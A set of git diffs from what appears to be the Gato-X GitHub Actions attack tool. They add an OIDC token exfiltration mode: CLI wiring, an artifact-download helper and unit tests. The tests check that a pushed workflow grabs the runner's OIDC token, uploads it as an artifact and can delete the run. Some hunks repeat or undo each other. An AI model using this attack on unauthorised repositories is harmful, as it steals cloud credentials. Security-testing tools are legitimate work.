+            args.file_name = "test"
 
     if args.runner_on_runner and not (args.target_os and args.target_arch):
         parser.error(
@@ -324,6 +333,46 @@ async def attack(args, parser):
             args.delete_run,
             args.file_name,
             scopes,
+            environments=args.environments,
+            runner=args.runner_override,
+        )
+
+    elif args.oidc:
+        scopes = None
+        if args.gh_token.startswith("github_pat_"):
+            gh_enumeration_runner = FineGrainedEnumerator(
+                pat=args.gh_token,
+                socks_proxy=args.socks_proxy,
+                http_proxy=args.http_proxy,
+                github_url=args.api_url,
+            )
+            scopes = await gh_enumeration_runner.detect_scopes(args.target)
+            if "contents:write" not in scopes and "workflows:write" not in scopes:
+                parser.error(
+                    f"{Fore.RED}[-]{Style.RESET_ALL} The provided fine-grained token does not have the necessary 'contents:write' and 'workflows:write' permission on the targeted repository!"
+                )
+                return
+
+        gh_attack_runner = OIDCAttack(
+            args.gh_token,
+            author_email=args.author_email,
+            author_name=args.author_name,
+            socks_proxy=args.socks_proxy,
+            http_proxy=args.http_proxy,
+            timeout=timeout,
+            github_url=args.api_url,
+        )
+
+        await gh_attack_runner.oidc_exfil(
+            args.target,
+            args.branch,
+            args.message,
+            args.delete_run,
+            args.file_name,
+            args.oidc_audience,
+            scopes,
+            environments=args.environments,
+            runner=args.runner_override,
         )
 
 

--- a/gatox/enumerate/finegrained_enumeration.py
+++ b/gatox/enumerate/finegrained_enumeration.py
@@ -412,7 +412,7 @@ class FineGrainedEnumerator(Enumerator):
             return [], {}
 
         public_repos = await self.api.get_own_repos(
-            affiliation="owner,collaborator,organization_member", visibility="public"
+            affiliation="owner,collaborator", visibility="public"
         )
         write_accessible_repos = []
         if public_repos:

--- a/gatox/enumerate/finegrained_enumeration.py
+++ b/gatox/enumerate/finegrained_enumeration.py
@@ -412,7 +412,7 @@ class FineGrainedEnumerator(Enumerator):
             return [], {}
 
         public_repos = await self.api.get_own_repos(
-            affiliation="owner,collaborator", visibility="public"
+            affiliation="owner,collaborator,organization_member", visibility="public"
         )
         write_accessible_repos = []
         if public_repos:

--- a/gatox/enumerate/results/artifact_poisoning_result.py
+++ b/gatox/enumerate/results/artifact_poisoning_result.py
@@ -33,7 +33,6 @@ class ArtifactPoisoningResult(AnalysisResult):
         confidence_score: Confidence,
         attack_complexity_score: Complexity,
     ):
-
         repository_name = path[0].repo_name()
 
         super().__init__(

--- a/gatox/github/api.py
+++ b/gatox/github/api.py
@@ -1171,6 +1171,40 @@ class Api:
 
         return files
 
+    async def retrieve_all_workflow_artifacts(
+        self, repo_name: str, workflow_id: int
+    ) -> dict:
+        """Download all artifacts for a workflow run and return their files.
+
+        Args:
+            repo_name (str): Repository name.
+            workflow_id (int): Workflow run ID.
+
+        Returns:
+            dict: {artifact_name: {filename: bytes}} for every artifact in the run.
+        """
+        result = {}
+
+        req = await self.call_get(
+            f"/repos/{repo_name}/actions/runs/{workflow_id}/artifacts"
+        )
+        if req.status_code != 200:
+            return result
+
+        for artifact in req.json().get("artifacts", []):
+            download_url = artifact["archive_download_url"]
+            archive = await self.call_get(
+                download_url.replace("https://api.github.com", "")
+            )
+            files = {}
+            with zipfile.ZipFile(io.BytesIO(archive.content)) as zf:
+                for zipinfo in zf.infolist():
+                    with zf.open(zipinfo) as f:
+                        files[zipinfo.filename] = f.read()
+            result[artifact["name"]] = files
+
+        return result
+
     async def download_workflow_artifact(
         self, repo_name: str, workflow_id: int, destination: str
     ):

--- a/gatox/workflow_graph/visitors/artifact_poisoning_visitor.py
+++ b/gatox/workflow_graph/visitors/artifact_poisoning_visitor.py
@@ -65,7 +65,6 @@ class ArtifactPoisoningVisitor:
                     # Terminal, we need to dfs to a sink now.
                     sinks = await graph.dfs_to_tag(node, "sink", api)
                     if sinks:
-
                         VisitorUtils.append_path(path, sinks[0])
 
                         VisitorUtils._add_results(
@@ -96,7 +95,6 @@ class ArtifactPoisoningVisitor:
         for path_set in all_paths:
             for path in path_set:
                 try:
-
                     await ArtifactPoisoningVisitor.__process_path(
                         path, graph, api, results
                     )

--- a/gatox/workflow_parser/source_map.py
+++ b/gatox/workflow_parser/source_map.py
@@ -24,8 +24,10 @@ def build_workflow_source_map(workflow_yaml_node: yaml.Node) -> dict:
         return source_map
 
     valid_jobs = filter(
-        lambda item: isinstance(item[0], yaml.ScalarNode)
-        and isinstance(item[1], yaml.MappingNode),
+        lambda item: (
+            isinstance(item[0], yaml.ScalarNode)
+            and isinstance(item[1], yaml.MappingNode)
+        ),
         jobs_node.value,
     )
 

--- a/mkdocs.yml
+++ b/mkdocs.yml
@@ -22,6 +22,7 @@ nav:
           - Overview: user-guide/advanced/index.md
           - Understanding GitHub Actions Vulnerabilities: user-guide/advanced/vulnerabilities.md
           - Complex Attack Scenarios: user-guide/advanced/complex-attacks.md
+          - OIDC Token Exchange: user-guide/advanced/oidc.md
   - Quick Start: quick-start.md
   - Contribution Guide:
       - Overview: contribution-guide/contributions.md

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -29,7 +29,6 @@ dependencies = [
 test = [
     "pytest",
     "pytest-cov",
-    "black",
     "pytest-asyncio",
     "ruff",
     "pyright",
@@ -60,27 +59,13 @@ source = ["gatox"]
 [tool.coverage.html]
 directory = "cov_html"
 
-[tool.black]
-line-length = 88
-target-version = ['py310']
-include = '\.pyi?$'
-extend-exclude = '''
-/(
-  # directories
-  \.eggs
-  | \.git
-  | \.hg
-  | \.mypy_cache
-  | \.tox
-  | \.venv
-  | build
-  | dist
-)/
-'''
-
 [tool.ruff]
 line-length = 88
 target-version = "py310"
+
+[tool.ruff.format]
+quote-style = "double"
+indent-style = "space"
 
 [tool.ruff.lint]
 select = [

--- a/unit_test/graph/test_artifact_poisoning.py
+++ b/unit_test/graph/test_artifact_poisoning.py
@@ -249,7 +249,6 @@ class TestArtifactPoisoningVisitor:
             patch.object(VisitorUtils, "append_path") as mock_append,
             patch.object(VisitorUtils, "_add_results") as mock_add_results,
         ):
-
             await ArtifactPoisoningVisitor._ArtifactPoisoningVisitor__process_path(
                 path, mock_graph, mock_api, results
             )
@@ -295,7 +294,6 @@ class TestArtifactPoisoningVisitor:
             patch.object(VisitorUtils, "append_path") as mock_append,
             patch.object(VisitorUtils, "_add_results") as mock_add_results,
         ):
-
             await ArtifactPoisoningVisitor._ArtifactPoisoningVisitor__process_path(
                 path, mock_graph, mock_api, results
             )
@@ -331,7 +329,6 @@ class TestArtifactPoisoningVisitor:
             patch.object(VisitorUtils, "initialize_action_node") as mock_init,
             patch.object(VisitorUtils, "_add_results") as mock_add_results,
         ):
-
             await ArtifactPoisoningVisitor._ArtifactPoisoningVisitor__process_path(
                 path, mock_graph, mock_api, results
             )
@@ -379,7 +376,6 @@ class TestArtifactPoisoningVisitor:
             patch.object(VisitorUtils, "append_path") as _,
             patch.object(VisitorUtils, "_add_results") as mock_add_results,
         ):
-
             await ArtifactPoisoningVisitor._ArtifactPoisoningVisitor__process_path(
                 path, mock_graph, mock_api, results
             )
@@ -463,7 +459,6 @@ class TestArtifactPoisoningVisitor:
             patch.object(VisitorUtils, "append_path", return_value=path) as mock_append,
             patch.object(VisitorUtils, "_add_results") as mock_add_results,
         ):
-
             await ArtifactPoisoningVisitor._ArtifactPoisoningVisitor__process_path(
                 path, mock_graph, mock_api, results
             )

--- a/unit_test/graph/test_edge_cases.py
+++ b/unit_test/graph/test_edge_cases.py
@@ -209,9 +209,9 @@ class TestDFSWithNonExistentNodes:
         # The DFS should find one path: start -> path2_middle -> target
         # The path through path1_middle should be blocked by the non_existent node
         assert len(paths) == 1, f"Expected 1 path, got {len(paths)} paths: {paths}"
-        assert (
-            len(paths[0]) == 3
-        ), f"Expected path length 3, got {len(paths[0])}: {paths[0]}"
+        assert len(paths[0]) == 3, (
+            f"Expected path length 3, got {len(paths[0])}: {paths[0]}"
+        )
         assert paths[0][0] == start
         assert paths[0][1] == path2_middle
         assert paths[0][2] == target
@@ -281,7 +281,6 @@ class TestGraphBuilderNonExistentHandling:
             ),
             patch("gatox.caching.cache_manager.CacheManager.set_workflow"),
         ):
-
             # Should mark as non-existent
             await builder._initialize_callee_node(workflow, mock_api)
 
@@ -317,7 +316,6 @@ class TestGraphBuilderNonExistentHandling:
             patch("gatox.caching.cache_manager.CacheManager.set_workflow"),
             patch.object(builder, "build_workflow_jobs", new_callable=AsyncMock),
         ):
-
             await builder._initialize_callee_node(workflow, mock_api)
 
         # Verify workflow is properly initialized

--- a/unit_test/graph/test_pwn_req_visitor.py
+++ b/unit_test/graph/test_pwn_req_visitor.py
@@ -109,7 +109,6 @@ async def test_process_single_path_with_permission_check(
         patch.object(VisitorUtils, "append_path"),
         patch.object(VisitorUtils, "_add_results") as mock_add_results,
     ):
-
         await PwnRequestVisitor._process_single_path(
             path, mock_graph, mock_api, rule_cache, results
         )
@@ -184,7 +183,6 @@ async def test_process_single_path_blocker_breaks_execution(
         patch.object(VisitorUtils, "append_path"),
         patch.object(VisitorUtils, "_add_results") as mock_add_results,
     ):
-
         await PwnRequestVisitor._process_single_path(
             path, mock_graph, mock_api, rule_cache, results
         )
@@ -260,7 +258,6 @@ async def test_process_single_path_approval_gate_affects_complexity(
         patch.object(VisitorUtils, "append_path"),
         patch.object(VisitorUtils, "_add_results") as mock_add_results,
     ):
-
         await PwnRequestVisitor._process_single_path(
             path, mock_graph, mock_api, rule_cache, results
         )
@@ -329,7 +326,6 @@ async def test_process_single_path_job_node_with_deployments(
         patch.object(VisitorUtils, "append_path"),
         patch.object(VisitorUtils, "_add_results") as mock_add_results,
     ):
-
         await PwnRequestVisitor._process_single_path(
             path, mock_graph, mock_api, rule_cache, results
         )
@@ -399,7 +395,6 @@ async def test_process_single_path_job_node_with_outputs_and_env_lookup(
         patch.object(VisitorUtils, "append_path"),
         patch.object(VisitorUtils, "_add_results") as mock_add_results,
     ):
-
         await PwnRequestVisitor._process_single_path(
             path, mock_graph, mock_api, rule_cache, results
         )
@@ -459,7 +454,6 @@ async def test_process_single_path_step_node_with_outputs_and_env(
         patch.object(VisitorUtils, "append_path"),
         patch.object(VisitorUtils, "_add_results") as mock_add_results,
     ):
-
         await PwnRequestVisitor._process_single_path(
             path, mock_graph, mock_api, rule_cache, results
         )
@@ -590,7 +584,6 @@ async def test_process_single_path_workflow_node_labeled_trigger(
         patch.object(VisitorUtils, "append_path"),
         patch.object(VisitorUtils, "_add_results") as mock_add_results,
     ):
-
         await PwnRequestVisitor._process_single_path(
             path, mock_graph, mock_api, rule_cache, results
         )
@@ -644,7 +637,6 @@ async def test_process_single_path_workflow_run_trigger(
         patch.object(VisitorUtils, "append_path"),
         patch.object(VisitorUtils, "_add_results") as mock_add_results,
     ):
-
         await PwnRequestVisitor._process_single_path(
             path, mock_graph, mock_api, rule_cache, results
         )
@@ -748,7 +740,6 @@ async def test_process_single_path_step_node_soft_gate(
         patch.object(VisitorUtils, "append_path"),
         patch.object(VisitorUtils, "_add_results") as mock_add_results,
     ):
-
         await PwnRequestVisitor._process_single_path(
             path, mock_graph, mock_api, rule_cache, results
         )
@@ -806,7 +797,6 @@ async def test_process_single_path_action_node_initialization(
         patch.object(VisitorUtils, "initialize_action_node") as mock_init_action,
         patch.object(VisitorUtils, "_add_results") as mock_add_results,
     ):
-
         await PwnRequestVisitor._process_single_path(
             path, mock_graph, mock_api, rule_cache, results
         )
@@ -861,7 +851,6 @@ async def test_process_single_path_checkout_with_env_metadata(
         patch.object(VisitorUtils, "append_path"),
         patch.object(VisitorUtils, "_add_results") as mock_add_results,
     ):
-
         await PwnRequestVisitor._process_single_path(
             path, mock_graph, mock_api, rule_cache, results
         )
@@ -913,7 +902,6 @@ async def test_process_single_path_no_sinks_unknown_confidence(
         patch.object(VisitorUtils, "append_path"),
         patch.object(VisitorUtils, "_add_results") as mock_add_results,
     ):
-
         await PwnRequestVisitor._process_single_path(
             path, mock_graph, mock_api, rule_cache, results
         )

--- a/unit_test/graph/test_review_injection_visitor.py
+++ b/unit_test/graph/test_review_injection_visitor.py
@@ -137,7 +137,6 @@ async def test_find_injections_step_node_injectable_with_unsafe_context(
             "gatox.workflow_graph.visitors.review_injection_visitor.VisitorUtils"
         ) as mock_visitor_utils,
     ):
-
         mock_get_token.return_value = "github.event.review.body"
         mock_pr_review_unsafe.return_value = True  # This is unsafe
         mock_visitor_utils._add_results.return_value = None
@@ -180,7 +179,6 @@ async def test_find_injections_step_node_injectable_with_body_context(
             "gatox.workflow_graph.visitors.review_injection_visitor.VisitorUtils"
         ) as mock_visitor_utils,
     ):
-
         mock_get_token.return_value = "some_body_value"  # Contains 'body'
         mock_pr_review_unsafe.return_value = False  # Not unsafe by prReviewUnsafe
         mock_visitor_utils._add_results.return_value = None
@@ -245,7 +243,6 @@ async def test_find_injections_job_node_with_env_vars_and_outputs(mock_api, mock
             "gatox.workflow_graph.visitors.review_injection_visitor.VisitorUtils"
         ) as mock_visitor_utils,
     ):
-
         mock_getToken.side_effect = lambda x: x
         mock_prReviewUnsafe.return_value = True
 
@@ -304,7 +301,6 @@ async def test_find_injections_step_node_with_inputs_context(mock_api, mock_grap
             "gatox.workflow_graph.visitors.review_injection_visitor.VisitorUtils"
         ) as mock_visitor_utils,
     ):
-
         mock_regex.findall.return_value = ["inputs.INPUT_VAR"]
         mock_getToken.side_effect = lambda x: x
         mock_prReviewUnsafe.return_value = True
@@ -361,7 +357,6 @@ async def test_find_injections_step_node_with_env_context(mock_api, mock_graph):
             "gatox.workflow_graph.visitors.review_injection_visitor.VisitorUtils"
         ) as mock_visitor_utils,
     ):
-
         mock_getToken.side_effect = lambda x: x
         mock_prReviewUnsafe.return_value = True
 
@@ -402,7 +397,6 @@ async def test_find_injections_step_node_safe_github_context(mock_api, mock_grap
             "gatox.workflow_graph.visitors.review_injection_visitor.VisitorUtils"
         ) as mock_visitor_utils,
     ):
-
         mock_getToken.side_effect = lambda x: x
         mock_prReviewUnsafe.return_value = False  # Safe context
 
@@ -444,7 +438,6 @@ async def test_find_injections_workflow_node_with_env_vars(mock_api, mock_graph)
             "gatox.workflow_graph.visitors.review_injection_visitor.VisitorUtils"
         ) as mock_visitor_utils,
     ):
-
         mock_getToken.side_effect = lambda x: x
         mock_prReviewUnsafe.return_value = True
 

--- a/unit_test/graph/test_toctou_visitor.py
+++ b/unit_test/graph/test_toctou_visitor.py
@@ -858,7 +858,6 @@ async def test_process_path_job_node_with_outputs(mock_graph, mock_api):
             "gatox.workflow_graph.visitors.dispatch_toctou_visitor.CacheManager"
         ) as mock_cache_manager,
     ):
-
         mock_cache_manager.return_value.get_repository.return_value = mock_repo
         mock_visitor_utils.check_mutable_ref.return_value = True
         mock_visitor_utils.append_path.return_value = None
@@ -971,7 +970,6 @@ async def test_process_path_step_node_checkout_with_context_regex(mock_graph, mo
             "gatox.workflow_graph.visitors.dispatch_toctou_visitor.VisitorUtils"
         ) as mock_visitor_utils,
     ):
-
         mock_cache_manager.return_value.get_repository.return_value = mock_repo
         mock_regex.findall.return_value = ["inputs.pr_number"]
         mock_visitor_utils.check_mutable_ref.return_value = True
@@ -1021,7 +1019,6 @@ async def test_process_path_step_node_checkout_env_lookup(mock_graph, mock_api):
             "gatox.workflow_graph.visitors.dispatch_toctou_visitor.VisitorUtils"
         ) as mock_visitor_utils,
     ):
-
         mock_cache_manager.return_value.get_repository.return_value = mock_repo
         mock_visitor_utils.check_mutable_ref.return_value = True
         mock_visitor_utils._add_results.return_value = None
@@ -1071,7 +1068,6 @@ async def test_process_path_step_node_checkout_inputs_env_lookup(mock_graph, moc
             "gatox.workflow_graph.visitors.dispatch_toctou_visitor.VisitorUtils"
         ) as mock_visitor_utils,
     ):
-
         mock_cache_manager.return_value.get_repository.return_value = mock_repo
         mock_visitor_utils.check_mutable_ref.return_value = True
         mock_visitor_utils._add_results.return_value = None
@@ -1126,7 +1122,6 @@ async def test_process_path_step_node_checkout_dollar_brace_env_lookup(
             "gatox.workflow_graph.visitors.dispatch_toctou_visitor.VisitorUtils"
         ) as mock_visitor_utils,
     ):
-
         mock_cache_manager.return_value.get_repository.return_value = mock_repo
         # Mock CONTEXT_REGEX to extract the variable
         mock_regex.findall.return_value = ["inputs.pr_number"]
@@ -1383,7 +1378,6 @@ async def test_process_path_step_node_checkout_context_regex_empty_result(
             "gatox.workflow_graph.visitors.dispatch_toctou_visitor.VisitorUtils"
         ) as mock_visitor_utils,
     ):
-
         mock_cache_manager.return_value.get_repository.return_value = mock_repo
         # Mock CONTEXT_REGEX to return empty list
         mock_regex.findall.return_value = []
@@ -1442,7 +1436,6 @@ async def test_process_path_step_node_checkout_input_lookup(mock_graph, mock_api
             "gatox.workflow_graph.visitors.dispatch_toctou_visitor.VisitorUtils"
         ) as mock_visitor_utils,
     ):
-
         mock_cache_manager.return_value.get_repository.return_value = mock_repo
         # Mock CONTEXT_REGEX to extract and allow stripping inputs.
         mock_regex.findall.return_value = ["inputs.pr_ref"]
@@ -1495,7 +1488,6 @@ async def test_process_path_step_node_checkout_with_sinks(mock_graph, mock_api):
             "gatox.workflow_graph.visitors.dispatch_toctou_visitor.VisitorUtils"
         ) as mock_visitor_utils,
     ):
-
         mock_cache_manager.return_value.get_repository.return_value = mock_repo
         mock_visitor_utils.check_mutable_ref.return_value = True
         mock_visitor_utils.append_path.return_value = None

--- a/unit_test/graph/test_visitor_utils.py
+++ b/unit_test/graph/test_visitor_utils.py
@@ -320,12 +320,12 @@ async def test_add_repo_results_file_caching(monkeypatch):
     await VisitorUtils.add_repo_results(data, TrackingApi())
 
     # Verify that API was only called once for the file
-    assert (
-        api_call_count["get_file_last_updated"] == 1
-    ), "API should only be called once per file"
-    assert (
-        api_call_count["get_commit_merge_date"] == 1
-    ), "Merge date API should only be called once per file"
+    assert api_call_count["get_file_last_updated"] == 1, (
+        "API should only be called once per file"
+    )
+    assert api_call_count["get_commit_merge_date"] == 1, (
+        "Merge date API should only be called once per file"
+    )
 
 
 @pytest.mark.asyncio
@@ -391,6 +391,6 @@ async def test_add_repo_results_different_files_cache(monkeypatch):
     await VisitorUtils.add_repo_results(data, TrackingApi())
 
     # Verify that API was called for each different file
-    assert (
-        api_call_count["get_file_last_updated"] == 2
-    ), "API should be called once per unique file"
+    assert api_call_count["get_file_last_updated"] == 2, (
+        "API should be called once per unique file"
+    )

--- a/unit_test/test_app_enum.py
+++ b/unit_test/test_app_enum.py
@@ -349,7 +349,9 @@ class TestAppEnumerator:
 
         # Setup mock for enumerate_installation
         installation_result1 = Execution()
-        installation_result1.add_repositories([MagicMock(name="repo1"), MagicMock(name="repo2")])  # type: ignore[arg-type]
+        installation_result1.add_repositories(
+            [MagicMock(name="repo1"), MagicMock(name="repo2")]
+        )  # type: ignore[arg-type]
         installation_result1.set_user_details({"installation_id": 11111})
 
         installation_result2 = Execution()

--- a/unit_test/test_finegrained_enumeration_simple.py
+++ b/unit_test/test_finegrained_enumeration_simple.py
@@ -518,9 +518,9 @@ class TestFineGrainedEnumeratorSimple:
         }
 
         # Check that we have write permissions (which means write probes succeeded)
-        assert expected_write_scopes.issubset(
-            result
-        ), f"Expected {expected_write_scopes} to be subset of {result}"
+        assert expected_write_scopes.issubset(result), (
+            f"Expected {expected_write_scopes} to be subset of {result}"
+        )
 
     async def test_enumerate_fine_grained_token_no_repos(self):
         """Test enumerate_fine_grained_token when token has no write+ public repos and no private repos."""

--- a/unit_test/test_notifications.py
+++ b/unit_test/test_notifications.py
@@ -111,7 +111,6 @@ class TestSlackWebhook:
             patch("httpx.AsyncClient") as mock_client,
             patch("asyncio.sleep") as mock_sleep,
         ):
-
             mock_context = AsyncMock()
             mock_client.return_value.__aenter__.return_value = mock_context
 
@@ -140,7 +139,6 @@ class TestSlackWebhook:
             patch("httpx.AsyncClient") as mock_client,
             patch("asyncio.sleep") as mock_sleep,
         ):
-
             mock_context = AsyncMock()
             mock_client.return_value.__aenter__.return_value = mock_context
             mock_context.post = AsyncMock(
@@ -273,7 +271,6 @@ class TestDiscordWebhook:
             patch("httpx.AsyncClient") as mock_client,
             patch("asyncio.sleep") as mock_sleep,
         ):
-
             mock_context = AsyncMock()
             mock_client.return_value.__aenter__.return_value = mock_context
 
@@ -302,7 +299,6 @@ class TestDiscordWebhook:
             patch("httpx.AsyncClient") as mock_client,
             patch("asyncio.sleep") as mock_sleep,
         ):
-
             mock_context = AsyncMock()
             mock_client.return_value.__aenter__.return_value = mock_context
             mock_context.post = AsyncMock(

--- a/unit_test/test_oidc_attack.py
+++ b/unit_test/test_oidc_attack.py
@@ -53,7 +53,7 @@ def test_create_oidc_exfil_yaml_environments():
     assert "matrix" in yaml_str
     assert "production" in yaml_str
     assert "staging" in yaml_str
-    assert "files-${{ matrix.environment }}" in yaml_str
+    assert "files-${{ matrix.safe_name }}" in yaml_str
     assert "environment: ${{ matrix.environment }}" in yaml_str
 
 

--- a/unit_test/test_oidc_attack.py
+++ b/unit_test/test_oidc_attack.py
@@ -1,0 +1,322 @@
+import re
+from unittest.mock import AsyncMock, patch
+
+from gatox.attack.oidc.oidc_attack import OIDCAttack
+from gatox.github.api import Api
+
+
+def escape_ansi(line):
+    ansi_escape = re.compile(r"(?:\x1B[@-_]|[\x80-\x9F])[0-?]*[ -/]*[@-~]")
+    return ansi_escape.sub("", line)
+
+
+# Minimal valid JWT with claims: {"sub": "repo:owner/repo:ref:refs/heads/main", "iss": "https://token.actions.githubusercontent.com"}
+MOCK_JWT = (
+    "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9"
+    ".eyJzdWIiOiJyZXBvOm93bmVyL3JlcG86cmVmOnJlZnMvaGVhZHMvbWFpbiIsImlzcyI6Imh0dHBzOi8vdG9rZW4uYWN0aW9ucy5naXRodWJ1c2VyY29udGVudC5jb20ifQ"
+    ".signature"
+)
+
+
+def test_create_oidc_exfil_yaml():
+    """Test OIDC exfil YAML generation."""
+    attacker = OIDCAttack(
+        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
+        socks_proxy=None,
+        http_proxy="localhost:8080",
+    )
+
+    yaml_str = attacker.create_oidc_exfil_yaml("evilBranch", "sigstore")
+
+    assert "ACTIONS_ID_TOKEN_REQUEST_TOKEN" in yaml_str
+    assert "ACTIONS_ID_TOKEN_REQUEST_URL" in yaml_str
+    assert "audience=sigstore" in yaml_str
+    assert "oidc_token.txt" in yaml_str
+    assert "actions/upload-artifact@v4" in yaml_str
+    assert "id-token" in yaml_str
+
+
+def test_create_oidc_exfil_yaml_custom_audience():
+    """Test OIDC exfil YAML with a custom audience."""
+    yaml_str = OIDCAttack.create_oidc_exfil_yaml("branch", "sts.amazonaws.com")
+
+    assert "audience=sts.amazonaws.com" in yaml_str
+    assert "matrix" not in yaml_str
+
+
+def test_create_oidc_exfil_yaml_environments():
+    """Test OIDC exfil YAML includes a matrix when environments are provided."""
+    yaml_str = OIDCAttack.create_oidc_exfil_yaml(
+        "branch", "sigstore", ["production", "staging"]
+    )
+
+    assert "matrix" in yaml_str
+    assert "production" in yaml_str
+    assert "staging" in yaml_str
+    assert "files-${{ matrix.environment }}" in yaml_str
+    assert "environment: ${{ matrix.environment }}" in yaml_str
+
+
+def test_decode_jwt_claims():
+    """Test JWT payload decoding."""
+    claims = OIDCAttack._decode_jwt_claims(MOCK_JWT)
+
+    assert claims is not None
+    assert claims["sub"] == "repo:owner/repo:ref:refs/heads/main"
+    assert claims["iss"] == "https://token.actions.githubusercontent.com"
+
+
+def test_decode_jwt_claims_invalid():
+    """Test JWT decoding returns None for non-JWT input."""
+    assert OIDCAttack._decode_jwt_claims("not.a.valid.jwt.at.all") is None
+    assert OIDCAttack._decode_jwt_claims("onlytwoparts") is None
+
+
+@patch("gatox.attack.attack.Api", return_value=AsyncMock(Api))
+async def test_oidc_exfil(mock_api, capsys):
+    """Test OIDC exfil full flow."""
+    mock_api.return_value.check_user.return_value = {
+        "user": "testUser",
+        "name": "test user",
+        "scopes": ["repo", "workflow"],
+    }
+    mock_api.return_value.get_repo_branch.return_value = 0
+    mock_api.return_value.get_recent_workflow.return_value = 11111111
+    mock_api.return_value.get_workflow_status.return_value = 1
+    mock_api.return_value.retrieve_workflow_artifact.return_value = {
+        "oidc_token.txt": MOCK_JWT.encode(),
+    }
+
+    gh_attacker = OIDCAttack(
+        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
+        socks_proxy=None,
+        http_proxy="localhost:8080",
+    )
+
+    await gh_attacker.oidc_exfil(
+        "targetRepo", None, None, False, "oidc_exfil", "sigstore"
+    )
+
+    captured = capsys.readouterr()
+    output = escape_ansi(captured.out)
+
+    assert "OIDC Token Retrieved" in output
+    assert MOCK_JWT in output
+
+
+@patch("gatox.attack.attack.Api", return_value=AsyncMock(Api))
+async def test_oidc_exfil_delete_run(mock_api, capsys):
+    """Test OIDC exfil with workflow deletion."""
+    mock_api.return_value.check_user.return_value = {
+        "user": "testUser",
+        "name": "test user",
+        "scopes": ["repo", "workflow"],
+    }
+    mock_api.return_value.get_repo_branch.return_value = 0
+    mock_api.return_value.get_recent_workflow.return_value = 11111111
+    mock_api.return_value.get_workflow_status.return_value = 1
+    mock_api.return_value.retrieve_workflow_artifact.return_value = {
+        "oidc_token.txt": MOCK_JWT.encode(),
+    }
+    mock_api.return_value.delete_workflow_run.return_value = True
+
+    gh_attacker = OIDCAttack(
+        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
+        socks_proxy=None,
+        http_proxy="localhost:8080",
+    )
+
+    await gh_attacker.oidc_exfil(
+        "targetRepo", None, None, True, "oidc_exfil", "sigstore"
+    )
+
+    mock_api.return_value.delete_workflow_run.assert_called_once()
+
+
+@patch("gatox.attack.attack.Api", return_value=AsyncMock(Api))
+async def test_oidc_exfil_baduser(mock_api, capsys):
+    """Test OIDC exfil with insufficient token scopes."""
+    mock_api.return_value.check_user.return_value = {
+        "user": "testUser",
+        "name": "test user",
+        "scopes": ["repo"],
+    }
+
+    gh_attacker = OIDCAttack(
+        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
+        socks_proxy=None,
+        http_proxy="localhost:8080",
+    )
+
+    await gh_attacker.oidc_exfil(
+        "targetRepo", None, None, False, "oidc_exfil", "sigstore"
+    )
+
+    captured = capsys.readouterr()
+    assert "does not have the necessary scopes" in escape_ansi(captured.out)
+
+
+@patch("gatox.attack.attack.Api", return_value=AsyncMock(Api))
+async def test_oidc_exfil_branchexist(mock_api, capsys):
+    """Test OIDC exfil where target branch already exists."""
+    mock_api.return_value.check_user.return_value = {
+        "user": "testUser",
+        "name": "test user",
+        "scopes": ["repo", "workflow"],
+    }
+    mock_api.return_value.get_repo_branch.return_value = 1
+
+    gh_attacker = OIDCAttack(
+        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
+        socks_proxy=None,
+        http_proxy="localhost:8080",
+    )
+
+    await gh_attacker.oidc_exfil(
+        "targetRepo", "exfilbranch", None, False, "oidc_exfil", "sigstore"
+    )
+
+    captured = capsys.readouterr()
+    assert "Remote branch, exfilbranch, already exists!" in escape_ansi(captured.out)
+
+
+@patch("gatox.attack.attack.Api", return_value=AsyncMock(Api))
+async def test_oidc_exfil_branchfail(mock_api, capsys):
+    """Test OIDC exfil where branch check fails."""
+    mock_api.return_value.check_user.return_value = {
+        "user": "testUser",
+        "name": "test user",
+        "scopes": ["repo", "workflow"],
+    }
+    mock_api.return_value.get_repo_branch.return_value = -1
+
+    gh_attacker = OIDCAttack(
+        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
+        socks_proxy=None,
+        http_proxy="localhost:8080",
+    )
+
+    await gh_attacker.oidc_exfil(
+        "targetRepo", "exfilbranch", None, False, "oidc_exfil", "sigstore"
+    )
+
+    captured = capsys.readouterr()
+    assert "Failed to check for remote branch!" in escape_ansi(captured.out)
+
+
+@patch("gatox.attack.attack.Api", return_value=AsyncMock(Api))
+async def test_oidc_exfil_no_artifact(mock_api, capsys):
+    """Test OIDC exfil when artifact retrieval fails."""
+    mock_api.return_value.check_user.return_value = {
+        "user": "testUser",
+        "name": "test user",
+        "scopes": ["repo", "workflow"],
+    }
+    mock_api.return_value.get_repo_branch.return_value = 0
+    mock_api.return_value.get_recent_workflow.return_value = 11111111
+    mock_api.return_value.get_workflow_status.return_value = 1
+    mock_api.return_value.retrieve_workflow_artifact.return_value = {}
+
+    gh_attacker = OIDCAttack(
+        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
+        socks_proxy=None,
+        http_proxy="localhost:8080",
+    )
+
+    await gh_attacker.oidc_exfil(
+        "targetRepo", None, None, False, "oidc_exfil", "sigstore"
+    )
+
+    captured = capsys.readouterr()
+    assert "Failed to retrieve OIDC token artifact" in escape_ansi(captured.out)
+
+
+MOCK_JWT_2 = (
+    "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9"
+    ".eyJzdWIiOiJyZXBvOm93bmVyL3JlcG86ZW52aXJvbm1lbnQ6c3RhZ2luZyIsImlzcyI6Imh0dHBzOi8vdG9rZW4uYWN0aW9ucy5naXRodWJ1c2VyY29udGVudC5jb20ifQ"
+    ".signature2"
+)
+
+
+@patch("gatox.attack.attack.Api", return_value=AsyncMock(Api))
+async def test_oidc_exfil_environments(mock_api, capsys):
+    """Test OIDC exfil with environments de-duplicates identical tokens."""
+    mock_api.return_value.check_user.return_value = {
+        "user": "testUser",
+        "name": "test user",
+        "scopes": ["repo", "workflow"],
+    }
+    mock_api.return_value.get_repo_branch.return_value = 0
+    mock_api.return_value.get_recent_workflow.return_value = 11111111
+    mock_api.return_value.get_workflow_status.return_value = 1
+
+    # production has a unique token; staging has a different token
+    mock_api.return_value.retrieve_all_workflow_artifacts.return_value = {
